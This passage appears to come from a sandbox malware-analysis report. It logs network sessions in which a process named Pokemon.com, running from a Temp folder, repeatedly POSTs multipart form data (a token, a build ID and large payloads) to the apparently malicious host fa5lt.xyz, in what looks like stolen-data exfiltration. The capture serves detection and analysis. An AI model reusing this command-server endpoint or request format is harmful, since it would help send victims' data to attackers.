                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-27 13:47:01 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:00 GMT
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
2024-12-27 13:47:01 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-27 13:47:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49839 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:05 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----5PP8Q9ZUA1NYMY5FCTR1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 505
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:05 UTC | 505 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------5PP8Q9ZUA1NYMY5FCTR1Cont
2024-12-27 13:47:06 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:47:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49846 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:06 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----N7YMYCBSR1N7YUAS2V3O
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 213453
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:06 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4e 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------N7YMYCBSR1N7YUAS2V3OContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------N7YMYCBSR1N7YUAS2V3OContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------N7YMYCBSR1N7YUAS2V3OCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:06 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:06 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:06 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:06 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 13:47:08 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49848 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:08 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----16PZM7GLFCBAAI58QQIW
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: fa5lt.xyz
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 13:47:08 UTC | 16355 | OUT | Data Ascii:
------16PZM7GLFCBAAI58QQIW
Content-Disposition: form-data; name="token"

e1d6e2869b01e5288d5e95125b4498c4
------16PZM7GLFCBAAI58QQIW
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------16PZM7GLFCBAAI58QQIW
Cont
2024-12-27 13:47:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 13:47:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49854 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:10 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----A1N7QQQQ1DJE3EK6FKFK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: fa5lt.xyz
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 13:47:10 UTC | 16355 | OUT | Data Ascii:
------A1N7QQQQ1DJE3EK6FKFK
Content-Disposition: form-data; name="token"

e1d6e2869b01e5288d5e95125b4498c4
------A1N7QQQQ1DJE3EK6FKFK
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------A1N7QQQQ1DJE3EK6FKFK
Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 13:47:12 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 13:47:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49859 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:11 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----A1N7QQQQ1DJE3EK6FKFK
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 493
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:11 UTC | 493 | OUT | Data Ascii:
------A1N7QQQQ1DJE3EK6FKFK
Content-Disposition: form-data; name="token"

e1d6e2869b01e5288d5e95125b4498c4
------A1N7QQQQ1DJE3EK6FKFK
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------A1N7QQQQ1DJE3EK6FKFK
Cont
2024-12-27 13:47:12 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 13:47:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49881 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:17 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JE37GLXT00ZMYMOZCJWL
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 509
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:17 UTC | 509 | OUT | Data Ascii:
------JE37GLXT00ZMYMOZCJWL
Content-Disposition: form-data; name="token"

e1d6e2869b01e5288d5e95125b4498c4
------JE37GLXT00ZMYMOZCJWL
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------JE37GLXT00ZMYMOZCJWL
Cont
2024-12-27 13:47:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 13:47:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49893 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:19 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----C2VKNG4E3W47YMGLXB1N
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 207993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:19 UTC | 16355 | OUT | Data Ascii:
------C2VKNG4E3W47YMGLXB1N
Content-Disposition: form-data; name="token"

e1d6e2869b01e5288d5e95125b4498c4
------C2VKNG4E3W47YMGLXB1N
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------C2VKNG4E3W47YMGLXB1N
Cont
2024-12-27 13:47:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:20 GMT
